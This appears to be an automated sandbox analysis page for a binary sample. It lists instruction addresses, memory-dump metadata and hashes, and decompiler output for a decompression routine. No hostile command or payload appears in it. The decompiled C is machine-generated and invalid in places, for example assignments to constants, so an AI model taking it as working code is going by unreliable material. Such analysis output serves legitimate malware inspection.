                                                                                                                          0x00000000
                                                                                                                          0x0040669b
                                                                                                                          0x0040669f
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066c4
                                                                                                                          0x004066cb
                                                                                                                          0x004066d2
                                                                                                                          0x004066d2
                                                                                                                          0x00000000
                                                                                                                          0x004066d2
                                                                                                                          0x004066a1
                                                                                                                          0x004066a4
                                                                                                                          0x004066a7
                                                                                                                          0x004066aa
                                                                                                                          0x004066b1
                                                                                                                          0x004065f5
                                                                                                                          0x004065f5
                                                                                                                          0x004065f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040678c
                                                                                                                          0x0040678f
                                                                                                                          0x00406690
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063c6
                                                                                                                          0x004063c8
                                                                                                                          0x004063cf
                                                                                                                          0x004063d0
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e5
                                                                                                                          0x004063e7
                                                                                                                          0x004063e7
                                                                                                                          0x004063e8
                                                                                                                          0x004063eb
                                                                                                                          0x004063f2
                                                                                                                          0x004063f5
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066e8
                                                                                                                          0x004066e8
                                                                                                                          0x004066ec
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00406824
                                                                                                                          0x004066f2
                                                                                                                          0x004066f5
                                                                                                                          0x004066f8
                                                                                                                          0x004066fc
                                                                                                                          0x004066ff
                                                                                                                          0x00406705
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x0040670a
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x00406710
                                                                                                                          0x00406710
                                                                                                                          0x00406714
                                                                                                                          0x00406774
                                                                                                                          0x00406777
                                                                                                                          0x0040677c
                                                                                                                          0x0040677d
                                                                                                                          0x0040677f
                                                                                                                          0x00406781
                                                                                                                          0x00406784
                                                                                                                          0x00406690
                                                                                                                          0x00406690
                                                                                                                          0x00000000
                                                                                                                          0x00406696
                                                                                                                          0x00406690
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x00406766
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406318
                                                                                                                          0x00406318
                                                                                                                          0x0040631c
                                                                                                                          0x004067e2
                                                                                                                          0x00000000
                                                                                                                          0x004067e2
                                                                                                                          0x00406322
                                                                                                                          0x00406325
                                                                                                                          0x00406328
                                                                                                                          0x0040632b
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x00406339
                                                                                                                          0x0040633c
                                                                                                                          0x0040633f
                                                                                                                          0x00406340
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x00406351
                                                                                                                          0x00406353
                                                                                                                          0x00406353
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065a5
                                                                                                                          0x004065a8
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065ad
                                                                                                                          0x004065b0
                                                                                                                          0x004065b3
                                                                                                                          0x004065b6
                                                                                                                          0x004065b9
                                                                                                                          0x004065bc
                                                                                                                          0x004065bd
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065c2
                                                                                                                          0x004065c5
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x004065ce
                                                                                                                          0x004065d2
                                                                                                                          0x004065d4
                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x00406356
                                                                                                                          0x00406356
                                                                                                                          0x00000000
                                                                                                                          0x00406356
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00000000
                                                                                                                          0x00406843
                                                                                                                          0x00406690
                                                                                                                          0x00406617
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406369

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                                                                                                          • Instruction ID: aa40489b15165fca9e2d73c9723ecf3d5b4a768092768a0400057c9dc9ec6b69
                                                                                                                          • Opcode Fuzzy Hash: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                                                                                                          • Instruction Fuzzy Hash: F6714471D04229CFDF28CF98C844BAEBBB1FB44305F25816AD816BB281D7785A86DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004062B1, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004062B1() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
